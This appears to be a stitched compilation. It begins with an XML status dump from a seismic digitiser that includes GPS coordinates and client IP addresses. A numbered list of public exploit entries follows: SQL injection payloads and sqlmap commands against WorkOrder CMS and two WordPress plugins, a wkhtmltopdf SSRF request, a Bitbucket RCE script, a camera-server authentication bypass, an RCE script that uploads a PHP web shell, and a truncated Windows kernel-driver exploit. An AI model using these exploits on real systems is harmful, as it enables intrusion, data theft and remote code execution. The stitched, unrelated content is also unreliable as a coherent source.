        <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'>1</reading>
      </list-item>
      <list-item status='-1' display-primary='true' path='45B1141C' title='DONB.HNZ.TM.10'>
        <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>100</reading>
        <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-BZ0</reading>
        <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:26:48.000000000Z</reading>
        <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading>
        <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading>
        <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'>1</reading>
      </list-item>
      <list-item status='-1' display-primary='true' path=' 9951403' title='DONB.HNN.TM.10'>
        <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>100</reading>
        <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-BN0</reading>
        <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:26:42.000000000Z</reading>
        <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading>
        <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading>
        <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'>1</reading>
      </list-item>
      <list-item status='-1' display-primary='true' path='3B38B4CE' title='DONB.HNE.TM.10'>
        <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>100</reading>
        <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-BE0</reading>
        <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:26:40.000000000Z</reading>
        <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading>
        <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading>
        <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'>1</reading>
      </list-item>
      <list-item status='-1' display-primary='true' path='3E12CA7F' title='DONB.MMZ.TM.00'>
        <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>4</reading>
        <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-AM8</reading>
        <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:24:48.000000000Z</reading>
        <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading>
        <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading>
        <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'></reading>
      </list-item>
      <list-item status='-1' display-primary='true' path='F194038D' title='DONB.MMN.TM.00'>
        <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>4</reading>
        <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-AM9</reading>
        <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:23:47.000000000Z</reading>
        <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading>
        <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading>
        <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'></reading>
      </list-item>
      <list-item status='-1' display-primary='true' path='80F951F3' title='DONB.MME.TM.00'>
        <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>4</reading>
        <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-AMA</reading>
        <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'>2022-06-14T11:23:57.000000000Z</reading>
        <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading>
        <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading>
        <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'></reading>
      </list-item>
      <list-item status='-1' display-primary='true' path=' DCFFBA' title='DONB.SOH.TM.0'>
        <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>nan</reading>
        <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-A00</reading>
        <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'></reading>
        <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading>
        <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading>
        <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'></reading>
      </list-item>
      <list-item status='-1' display-primary='true' path='F2D860DE' title='DONB-AIB'>
        <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>nan</reading>
        <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-AIB</reading>
        <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'></reading>
        <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading>
        <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading>
        <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'></reading>
      </list-item>
      <list-item status='-1' display-primary='true' path='8B4D513B' title='DONB.SOH.TM.1'>
        <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>nan</reading>
        <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-B00</reading>
        <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'></reading>
        <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading>
        <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading>
        <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'></reading>
      </list-item>
      <list-item status='-1' display-primary='true' path='5CC9B084' title='DONB-BIB'>
        <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>nan</reading>
        <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-BIB</reading>
        <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'></reading>
        <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading>
        <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading>
        <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'></reading>
      </list-item>
      <list-item status='-1' display-primary='true' path='B4418B8A' title='DONB.SOH.TM.X'>
        <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>nan</reading>
        <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-X00</reading>
        <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'></reading>
        <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading>
        <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading>
        <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'></reading>
      </list-item>
      <list-item status='-1' display-primary='true' path='AB7AFF68' title='DONB-XIB'>
        <reading status='-1' display-primary='true' path='sample_rate' units='Hz' title='Sample rate'>nan</reading>
        <reading status='-1' display-primary='true' path='gcf_name' title='GCF name'>DONB-XIB</reading>
        <reading status='-1' display-primary='true' path='last_block' title='Last block timestamp'></reading>
        <reading status='-1' display-primary='false' path='digitiser_type' title='GCF digitiser type'>CMG-DAS</reading>
        <reading status='-1' display-primary='false' path='ttl' title='GCF tap table lookup'>0</reading>
        <reading status='-1' display-primary='false' path='pga' title='GCF variable gain'></reading>
      </list-item>
    </list>
  </module>
  <module status='-1' display-primary='true' path='gdi2miniseed.default' title='Mini-SEED compressor. Default instance'>
    <reading status='100' display-primary='true' path='num_samples_in' title='Total number of data samples in'>6184483152</reading>
    <reading status='100' display-primary='true' path='last5_samples_in' title='Number of samples in last 5 minutes'>180000</reading>
    <reading status='100' display-primary='true' path='num_text_in' title='Total number of text samples in'>0</reading>
    <reading status='100' display-primary='true' path='last5_text_in' title='Number of text samples in last 5 minutes'>0</reading>
    <reading status='100' display-primary='true' path='num_ms_rec_out' title='Total number of Miniseed records out'>22682743</reading>
    <reading status='100' display-primary='true' path='last5_ms_rec_out' title='Number of Miniseed records out in last 5 minutes'>655</reading>
  </module>
  <module status='-1' display-primary='true' path='gps' title='GPS'>
    <reading status='100' display-primary='true' path='have_data' title='GPS data received'>true</reading>
    <reading status='100' display-primary='false' path='last_data' title='Last data received from GPS'>2022-06-14T11:26:53Z</reading>
    <reading status='100' display-primary='true' path='fix' title='Fix'>3D</reading>
    <reading status='100' display-primary='true' path='last_fix' title='Timestamp of last fix'>2022-06-14T11:26:53Z</reading>
    <reading status='-1' display-primary='true' path='latitude' units='°' title='Latitude'>13.909917</reading>
    <reading status='-1' display-primary='true' path='longitude' units='°' title='Longitude'>100.593734</reading>
    <reading status='-1' display-primary='true' path='elevation' units='m' title='Elevation'>3</reading>
    <reading status='100' 
```
display-primary='true' path='sv_count' title='Count of satellites in view'>26</reading> <reading status='100' display-primary='true' path='sv_used' title='Count of satellites used in fix'>12</reading> <reading status='-1' display-primary='true' path='sv_online' title='Timestamp of last nmea sentence'>2022-06-14T11:26:52Z</reading> <reading status='100' display-primary='true' path='rs232_detect' title='RS232 device detect'>true</reading> </module> <module status='-1' display-primary='true' path='ntp' title='NTP'> <reading status='-1' display-primary='false' path='mode' title='Timing mode'>direct_gps</reading> <reading status='-1' display-primary='true' path='mode_desc' title='Timing mode'>NTP is using a GPS reference source.</reading> <reading status='100' display-primary='true' path='locked' title='Clock locked'>true</reading> <reading status='100' display-primary='true' path='estimated_error' units='s' title='Estimated error'>0.000131</reading> <reading status='-1' display-primary='true' path='clock_source' title='Clock source'>GPS</reading> <reading status='-1' display-primary='false' path='peer' title='Peer'>127.127.28.1</reading> <reading status='-1' display-primary='false' path='peer_refid' title='Peer&apos;s reference ID'>GPS</reading> </module> <module status='-1' display-primary='true' path='seedlink-out.0' title='SEEDlink network server (instance 1)'> <reading status='-1' display-primary='true' path='num_records' title='Total number of records seen'>22682743</reading> <reading status='100' display-primary='true' path='last5_records' title='Number of records seen in last 5 minutes'>655</reading> <reading status='-1' display-primary='true' path='seq' title='Current sequence number'>3382931</reading> <reading status='100' display-primary='true' path='num_clients' title='Number of clients connected'>7</reading> <list status='-1' display-primary='true' path='clients' title='Clients'> <list-item status='-1' display-primary='true' path='2DF96A1C' title='Client 
#1700'> <reading status='-1' display-primary='true' path='remote_ip' title='Remote IP address'>123.160.221.22</reading> <reading status='-1' display-primary='true' path='remote_port' title='Remote TCP port'>21100</reading> <reading status='-1' display-primary='true' path='dialup' title='Dialup mode'>false</reading> <reading status='-1' display-primary='true' path='seqno' title='Last sequence no'>0</reading> </list-item> <list-item status='-1' display-primary='true' path='79C29121' title='Client #3412'> <reading status='-1' display-primary='true' path='remote_ip' title='Remote IP address'>113.53.234.98</reading> <reading status='-1' display-primary='true' path='remote_port' title='Remote TCP port'>33964</reading> <reading status='-1' display-primary='true' path='dialup' title='Dialup mode'>false</reading> <reading status='-1' display-primary='true' path='seqno' title='Last sequence no'>0</reading> </list-item> <list-item status='-1' display-primary='true' path='5060E6FF' title='Client #3581'> <reading status='-1' display-primary='true' path='remote_ip' title='Remote IP address'>203.114.125.67</reading> <reading status='-1' display-primary='true' path='remote_port' title='Remote TCP port'>48666</reading> <reading status='-1' display-primary='true' path='dialup' title='Dialup mode'>false</reading> <reading status='-1' display-primary='true' path='seqno' title='Last sequence no'>3221351</reading> </list-item> <list-item status='-1' display-primary='true' path='B1A1AB18' title='Client #3723'> <reading status='-1' display-primary='true' path='remote_ip' title='Remote IP address'>113.53.234.98</reading> <reading status='-1' display-primary='true' path='remote_port' title='Remote TCP port'>45158</reading> <reading status='-1' display-primary='true' path='dialup' title='Dialup mode'>false</reading> <reading status='-1' display-primary='true' path='seqno' title='Last sequence no'>3382931</reading> </list-item> <list-item status='-1' display-primary='true' path=' 91FC71C' 
title='Client #3720'> <reading status='-1' display-primary='true' path='remote_ip' title='Remote IP address'>221.128.101.50</reading> <reading status='-1' display-primary='true' path='remote_port' title='Remote TCP port'>55776</reading> <reading status='-1' display-primary='true' path='dialup' title='Dialup mode'>false</reading> <reading status='-1' display-primary='true' path='seqno' title='Last sequence no'>3382931</reading> </list-item> <list-item status='-1' display-primary='true' path='599CD113' title='Client #3721'> <reading status='-1' display-primary='true' path='remote_ip' title='Remote IP address'>118.175.2.50</reading> <reading status='-1' display-primary='true' path='remote_port' title='Remote TCP port'>60818</reading> <reading status='-1' display-primary='true' path='dialup' title='Dialup mode'>false</reading> <reading status='-1' display-primary='true' path='seqno' title='Last sequence no'>3382931</reading> </list-item> <list-item status='-1' display-primary='true' path='BAB80847' title='Client #3722'> <reading status='-1' display-primary='true' path='remote_ip' title='Remote IP address'>203.114.125.67</reading> <reading status='-1' display-primary='true' path='remote_port' title='Remote TCP port'>53984</reading> <reading status='-1' display-primary='true' path='dialup' title='Dialup mode'>false</reading> <reading status='-1' display-primary='true' path='seqno' title='Last sequence no'>3382931</reading> </list-item> </list> </module> <module status='-1' display-primary='true' path='storage' title='Storage'> <reading status='100' display-primary='true' path='state' title='State'>Inactive</reading> <reading status='100' display-primary='true' path='recording_state' title='Recording state'>Last flush good</reading> <reading status='-1' display-primary='true' path='last_accessed' title='Last accessed'>2022-06-14T08:10:14Z</reading> <reading status='-1' display-primary='true' path='free_space_pct' title='Free space'>27.2%</reading> <reading status='-1' 
display-primary='false' path='free_space' units='bytes' title='Available space'>17449811968</reading> <reading status='-1' display-primary='true' path='size' units='bytes' title='Storage size'>64134021120</reading> <reading status='100' display-primary='false' path='fs_type' title='Filesystem type'>VFAT</reading> <list status='-1' display-primary='false' path='clients' title='Clients'> </list> </module> <module status='-1' display-primary='true' path='system' title='Linux system'> <reading status='-1' display-primary='false' path='serial_number' title='Serial number'>DAS-405D62</reading> <reading status='-1' display-primary='true' path='uptime' units='s' title='System uptime'>10307538</reading> <reading status='-1' display-primary='true' path='load_average' title='Load Average'>1.72</reading> <reading status='100' display-primary='true' path='root_free_space' units='bytes' title='Root filesystem free space'>437809152</reading> <reading status='100' display-primary='true' path='root_percent_free_space' title='Root filesystem percentage space free'>77.0%</reading> <reading status='-1' display-primary='true' path='build_label' title='Software repository label'>&example;</reading> <reading status='-1' display-primary='true' path='build_version' title='Software build number'>15809</reading> <reading status='-1' display-primary='true' path='build_machine' title='Build machine'>CMG-DAS</reading> <reading status='-1' display-primary='true' path='last_reboot_1' title='Reboot 1'>2021-04-08T05:06:17Z</reading> <reading status='-1' display-primary='true' path='last_reboot_2' title='Reboot 2'>2021-04-08T07:02:50Z</reading> <reading status='-1' display-primary='true' path='last_reboot_3' title='Reboot 3'>2021-04-08T08:00:33Z</reading> <reading status='-1' display-primary='true' path='last_reboot_4' title='Reboot 4'>2021-04-08T08:30:41Z</reading> <reading status='-1' display-primary='true' path='last_reboot_5' title='Reboot 5'>2021-04-08T08:39:15Z</reading> <reading status='-1' 
display-primary='true' path='last_reboot_6' title='Reboot 6'>2021-04-08T08:46:24Z</reading> <reading status='-1' display-primary='true' path='last_reboot_7' title='Reboot 7'>2021-04-08T10:08:51Z</reading> <reading status='-1' display-primary='true' path='last_reboot_8' title='Reboot 8'>2021-04-09T07:10:41Z</reading> <reading status='-1' display-primary='true' path='last_reboot_9' title='Reboot 9'>2021-10-07T06:48:35Z</reading> <reading status='-1' display-primary='true' path='last_reboot_10' title='Reboot 10'>2022-02-15T04:14:30Z</reading> <reading status='100' display-primary='true' path='temperature' units='°C' title='System temperature'>43.875</reading> <reading status='100' display-primary='true' path='voltage' units='V' title='Power supply voltage'>12.75</reading> <reading status='100' display-primary='true' path='current' units='A' title='Power supply current'>0.442</reading> <reading status='100' display-primary='true' path='sensor_A_voltage' units='V' title='Sensor A voltage'>12.675</reading> <reading status='100' display-primary='true' path='sensor_A_current' units='A' title='Sensor A current'>0.289</reading> <reading status='100' display-primary='true' path='sensor_B_voltage' units='V' title='Sensor B voltage'>12.725</reading> <reading status='100' display-primary='true' path='sensor_B_current' units='A' title='Sensor B current'>0.002</reading> </module> </xml-status> ```
  7. ```text
     # Exploit Title: WorkOrder CMS 0.1.0 - SQL Injection
     # Date: Sep 22, 2022
     # Exploit Author: Chokri Hammedi
     # Vendor Homepage: https://github.com/romzes13/WorkOrderCMS
     # Software Link: https://github.com/romzes13/WorkOrderCMS/archive/refs/tags/v0.1.0.zip
     # Version: 0.1.0
     # Tested on: Linux

     # Auth Bypass:
     username: ' or '1'='1
     password: ' or '1'='1

     # sqlmap -r workorder.req --threads=10 --level 5 --risk 3 --dbs --dbms=mysql

     # POST Requests:
     Parameter: #1* ((custom) POST)
         Type: error-based
         Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
         Payload: userName=1'='1&password=1/' AND (SELECT 3761 FROM(SELECT COUNT(*),CONCAT(0x7170627071,(SELECT (ELT(3761=3761,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- UUhY!1111'/

         Type: stacked queries
         Title: MySQL >= 5.0.12 stacked queries (comment)
         Payload: userName=1'='1&password=1/';SELECT SLEEP(5)#!1111'/

         Type: time-based blind
         Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
         Payload: userName=1'='1&password=1/' AND (SELECT 6822 FROM (SELECT(SLEEP(5)))lYsh)-- YlDI!1111'/

     Parameter: #2* ((custom) POST)
         Type: error-based
         Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
         Payload: userName=1'='1&password=1/!1111' AND (SELECT 2010 FROM(SELECT COUNT(*),CONCAT(0x7170627071,(SELECT (ELT(2010=2010,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tqtn/

         Type: stacked queries
         Title: MySQL >= 5.0.12 stacked queries (comment)
         Payload: userName=1'='1&password=1/!1111';SELECT SLEEP(5)#/

         Type: time-based blind
         Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
         Payload: userName=1'='1&password=1/!1111' OR SLEEP(5)-- XuTW/
     ```
  8. ```text
     # Exploit Title: wkhtmltopdf 0.12.6 - Server Side Request Forgery
     # Date: 20/8/2022
     # Exploit Author: Momen Eldawakhly (Cyber Guy)
     # Vendor Homepage: https://wkhtmltopdf.org
     # Software Link: https://wkhtmltopdf.org/downloads.html
     # Version: 0.12.6
     # Tested on: Windows ASP.NET

     POST /PDF/FromHTML HTTP/1.1
     Host: vulnerable.com
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate
     Content-Type: application/x-www-form-urlencoded
     Content-Length: <length>
     Dnt: 1
     Upgrade-Insecure-Requests: 1
     Sec-Fetch-Dest: document
     Sec-Fetch-Mode: navigate
     Sec-Fetch-Site: same-origin
     Sec-Fetch-User: ?1
     Te: trailers
     Connection: close

     __RequestVerificationToken=Token&header=<PDFstructure+>....&data=<PDFstructure+>....<iframe+src="http://10.10.10.1">
     ```
  9. ```python
     # Exploit Title: Bitbucket v7.0.0 - RCE
     # Date: 09-23-2022
     # Exploit Author: khal4n1
     # Vendor Homepage: https://github.com/khal4n1
     # Tested on: Kali and ubuntu LTS 22.04
     # CVE : cve-2022-36804
     #****************************************************************#
     #The following exploit is used to exploit a vulnerability present in
     #Atlassian Bitbucket Server and Data Center 7.0.0 before version
     #7.6.17, from version 7.7.0 before version 7.17.10, from version
     #7.18.0 before version 7.21.4, from version 8.0.0 before version
     #8.0.3, from version 8.1.0 before version 8.1.3, and from version
     #8.2.0 before version 8.2.2, and from version 8.3.0 before 8.3.1
     #Usage Example
     # python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'cat /etc/passwd'
     # python3 mexploit.py --url http://127.0.0.1:7990 --cmd 'id'
     #The server will send a 500 http response with the stdout output from the
     # command executed.
     #****************************************************************#
     #!/usr/bin/python3
     import argparse
     import urllib
     from urllib import request
     import re

     #argument setup
     parser = argparse.ArgumentParser(description='Program to test bitbucket vulnerability CVE-2022-36804')
     parser.add_argument("--url", help="Set the target to attack. [REQUIRED]", required=True )
     parser.add_argument("--cmd", help="Set the command to execute. [DEFAULT ID]", required=True, default='id')
     args = parser.parse_args()
     cmd= urllib.parse.quote(args.cmd)

     #reads from the public repository what is available
     requ = request.urlopen(args.url+ "/repos?visibility=public")
     response = requ.read()

     #select a public project and stores it in a variable
     project = re.findall('7990/projects/(.*)/repos/', str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[-1]

     #Selects a public repo and stores it in a variable
     file = re.findall('/repos/(.*)/browse', str(re.findall('7990/projects/(.*)/repos/', str(response))[-1]))[0]

     # Exploitation
     try :
         attack = request.urlopen(args.url + "/rest/api/latest/projects/" + project + "/repos/" + file + "/archive?prefix=ax%00--exec=%60"+cmd+"%60%00--remote=origin")
         print (attack.response())
     except urllib.error.HTTPError as e:
         body = e.read().decode() # Read the body of the error response
         print (body)
     ```
  10. ```text
      # Exploit Title: "camp" Raspberry Pi camera server 1.0 - Authentication Bypass
      # Date: 2022-07-25
      # Exploit Author: Elias Hohl
      # Vendor Homepage: https://github.com/patrickfuller
      # Software Link: https://github.com/patrickfuller/camp
      # Version: < bf6af5c2e5cf713e4050c11c52dd4c55e89880b1
      # Tested on: Ubuntu 20.04
      # CVE : CVE-2022-37109

      "camp" Raspberry Pi camera server Authentication Bypass vulnerability
      https://medium.com/@elias.hohl/authentication-bypass-vulnerability-in-camp-a-raspberry-pi-camera-server-477e5d270904

      1. Start an instance of the "camp" server:
         python3 server.py --require-login

      2. Fetch the SHA-512 password hash using one of these methods:
         curl http://localhost:8000/static/password.tx%74
         OR
         curl http://localhost:8000/static/./password.txt --path-as-is
         OR
         curl http://localhost:8000/static/../camp/password.txt --path-as-is

      3. Execute the following python snippet (replace the hash with the hash you received in step 2).
         from tornado.web import create_signed_value
         import time
         print(create_signed_value("5895bb1bccf1da795c83734405a7a0193fbb56473842118dd1b66b2186a290e00fa048bc2a302d763c381ea3ac3f2bc2f30aaa005fb2c836bbf641d395c4eb5e", "camp", str(time.time())))

      4. In the browser, navigate to http://localhost:8000/, add a cookie named "camp" and set the value to the result of the script from step 3, then reload the page. You will be logged in.
      ```
  11. ```text
      # Exploit Title: NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi
      # Exploit Author: Elias Hohl
      # Date: 2022-08-01
      # Vendor Homepage: https://basixonline.net
      # Software Link: https://wordpress.org/plugins/nex-forms-express-wp-form-builder/
      # Tested on: Ubuntu 20.04
      # CVE : CVE-2022-3142

      Authenticated SQL injection vulnerability in the "NEX Forms" Wordpress plugin
      https://medium.com/@elias.hohl/authenticated-sql-injection-vulnerability-in-nex-forms-wordpress-plugin-35b8558dd0f5

      1. Start a new Wordpress instance using docker-compose.
      2. Install the NEX Forms plugin.
      3. Open the URL "/wp-admin/admin.php?page=nex-forms-dashboard&form_id=1" in your browser. Save the request to "nex-forms-req.txt" via Burp Suite.
      4. Execute the following command:
         sqlmap -r nex_forms_req.txt -p form_id --technique=T --dbms=mysql --level 5 --risk 3

      sqlmap will find a time-based blind payload:

      Parameter: form_id (GET)
          Type: time-based blind
          Title: MySQL >=5.0.12 AND time-based blind (query SLEEP)
          Payload: page=nex-forms-dashboard&form_id=1 AND (SELECT 4715 FROM (SELECT(SLEEP(5)))nPUi)
      ```
  12. ```text
      # Exploit Title: Translatepress Multilingual WordPress plugin < 2.3.3 - Authenticated SQL Injection
      # Exploit Author: Elias Hohl
      # Date: 2022-07-23
      # Vendor Homepage: https://translatepress.com/
      # Software Link: https://wordpress.org/plugins/translatepress-multilingual/
      # Version: < 2.3.3
      # Tested on: Ubuntu 20.04
      # CVE : CVE-2022-3141

      Authenticated SQL injection vulnerability in "Translatepress Multilingual" Wordpress plugin
      https://medium.com/@elias.hohl/authenticated-sql-injection-vulnerability-in-translatepress-multilingual-wordpress-plugin-effc08eda514

      1. Start a new Wordpress instance using docker-compose.
      2. Install the translatepress-multilingual plugin.
         Important note: If there are more than two languages allowed in a kind of premium plan, the exploit might be slightly different. We might need to insert deletion requests between each injection to prevent payloads being executed again. Also note that the en_us_en_gb dictionary table must exist. You might need to add these languages first so the table gets created.
      3. Connect your browser to Burp Suite, log in to Wordpress and add any language from the dropdown (the url to do this is /wp-admin/options-general.php?page=translate-press). In Burp Suite, do a right click -> copy to file, and save it as translatepress_req.txt.
      4. Go to /sample-page/?trp-edit-translation=preview (a URL to translate an arbitrary post). Again, in Burp Suite do a right mouse click -> save to file, and save it as translatepress_req_2.txt.
      5. Attack using sqlmap:
         sqlmap -r translatepress_req.txt -p trp_settings%5Btranslation-languages%5D%5B%5D --dbms=mysql --second-req translatepress_req_2.txt --technique=T --level 5 --risk 3

      sqlmap will find a time-based blind payload:

      Parameter: trp_settings[translation-languages][] (POST)
          Type: time-based blind
          Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
          Payload: option_page=trp_settings&action=update&_wpnonce=ca410d0e89&_wp_http_referer=/wp-admin/options-general.php?page=translate-press%26settings-updated=true&trp_settings[default-language]=en_US&trp_settings[publish-languages][]=en_US&trp_settings[translation-languages][]=en_US&trp_settings[translation-languages-formality][]=default&trp_settings[url-slugs][en_US]=en_us&trp_settings[translation-languages][]=en_GB WHERE 4372=4372 AND (SELECT 6967 FROM (SELECT(SLEEP(5)))ZDtR)-- bsZU&trp_settings[publish-languages][]=en_GB&trp_settings[translation-languages-formality][]=default&trp_settings[url-slugs][en_GB]=en&trp_settings[native_or_english_name]=english_name&trp_settings[add-subdirectory-to-default-language]=no&trp_settings[force-language-to-custom-links]=yes&trp_settings[shortcode-options]=flags-full-names&trp_settings[menu-options]=flags-full-names&trp_settings[trp-ls-floater]=yes&trp_settings[floater-options]=flags-full-names&trp_settings[floater-color]=dark&trp_settings[floater-position]=bottom-right&trp_email_course_email=
      ```
  13. ```python
      # Exploit Title: Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated)
      # Google Dork: N/A
      # Date: 2022-9-23
      # Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11
      # Vendor Homepage: https://www.sourcecodester.com/php/15667/online-diagnostic-lab-management-system-using-php-and-mysql-free-download.html
      # Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/diagnostic_0.zip
      # Tested on: windows 11 - XAMPP
      # Version: 1.0
      # Authentication Required: bypass login with sql injection

      #/usr/bin/python3
      import requests
      import os
      import sys
      import time
      import random

      # clean screen
      os.system("cls")
      os.system("clear")

      logo = '''
      ##################################################################
      #                                                                #
      #   Exploit Script ( Online Diagnostic Lab Management System )   #
      #                                                                #
      ##################################################################
      '''
      print(logo)

      url = str(input("Enter website url : "))
      username = ("' OR 1=1-- -")
      password = ("test")
      req = requests.Session()
      target = url+"/diagnostic/login.php"
      data = {'username':username,'password':password}
      website = req.post(target,data=data)

      files = open("rev.php","w")
      payload = "<?php system($_GET['cmd']);?>"
      files.write(payload)
      files.close()

      hash = random.getrandbits(128)
      name_file = str(hash)+".php"

      if "Login Successfully" in website.text:
          print("[+] Login Successfully")
          website_1 = url+"/diagnostic/php_action/createOrder.php"
          upload_file = {
              "orderDate": (None,""),
              "clientName": (None,""),
              "clientContact" : (None,""),
              "productName[]" : (None,""),
              "rateValue[]" : (None,""),
              "quantity[]" : (None,""),
              "totalValue[]" : (None,""),
              "subTotalValue" : (None,""),
              "totalAmountValue" : (None,""),
              "discount" : (None,""),
              "grandTotalValue" : (None,""),
              "gstn" : (None,""),
              "vatValue" : (None,""),
              "paid" : (None,""),
              "dueValue" : (None,""),
              "paymentType" : (None,""),
              "paymentStatus" : (None,""),
              "paymentPlace" : (None,""),
              "productImage" : (name_file,open("rev.php","rb"))
          }
          up = req.post(website_1,files=upload_file)
          print("[+] Check here file shell => "+url+"/diagnostic/assets/myimages/"+name_file)
          print("[+] can execute command here => "+url+"/diagnostic/assets/myimages/"+name_file+"?cmd=whoami")
      else:
          print("[-] Check username or password")
      ```
  14. ```cpp
      /*
      # Exploit Title: System Mechanic v15.5.0.61 - Arbitrary Read/Write
      # Date: 26-09-2022
      # Exploit Author: Brandon Marshall
      # Vendor Homepage: https://www.iolo.com/
      # Tested Version - System Mechanic version 15.5.0.61
      # Driver Version - 5.4.11 - amp.sys
      # Tested on OS - 64 bit Windows 10 (18362)
      # Fixed Version - System Mechanic 17.5.0.116
      # CVE : CVE-2018-5701
      */

      #include <iostream>
      #include <Windows.h>
      #include <psapi.h>
      #include <stdio.h>

      #pragma warning(disable:4996)

      typedef struct _kernelDriverInformation {
          char* imageName;
          void* imageBase;
      } kernelDriverInformation, * PKernelDriverInformation;

      typedef struct _functionInformation {
          char* functionName;
          void* functionOffset;
          void* functionBase;
      } functionInformation, * PFunctionInformation;

      void callDeviceIoControl(HANDLE deviceHandle, void* inputBuffer, DWORD inputBufferSize) {
          DWORD bytesReturned;
          NTSTATUS status = DeviceIoControl(deviceHandle, 0x226003, inputBuffer, inputBufferSize, NULL, NULL, (LPDWORD)&bytesReturned, (LPOVERLAPPED)NULL);
      }

      HANDLE getDeviceHandle(char* name) {
          DWORD generic_read = 0x80000000;
          DWORD generic_write = 0x40000000;
          HANDLE handle = CreateFileA((LPCSTR)name, GENERIC_READ | generic_write, NULL, NULL, 0x3, NULL, NULL);
          return handle;
      }

      void* CreateWriteAddresInAMPsKernelMemoryIOCTLBuffer(void* addressToDereference, SIZE_T bufferSize) {
          byte* maliciousBuffer = (byte*)malloc(bufferSize);
